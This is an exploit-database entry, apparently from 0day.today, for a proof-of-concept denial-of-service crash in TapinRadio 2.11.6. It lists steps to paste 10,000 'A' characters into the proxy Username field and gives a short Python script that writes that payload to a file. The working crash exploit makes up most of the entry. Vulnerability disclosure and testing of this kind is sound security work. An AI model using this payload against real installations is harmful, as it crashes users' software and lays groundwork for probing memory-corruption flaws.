id: 32777
date: 05/23/2019
title: TapinRadio 2.11.6 - (Uername) Denial of Service Exploit
author: Victor Mondragón
cves: 

#Exploit Title: TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
#Tested Version: 2.11.6
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: tapinadio_user.py
#2.- Open tapin_user.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 10000
	
f = open('tapin_user.txt', 'w')
f.write(cod)
f.close()

#  0day.today [2023-03-24]  #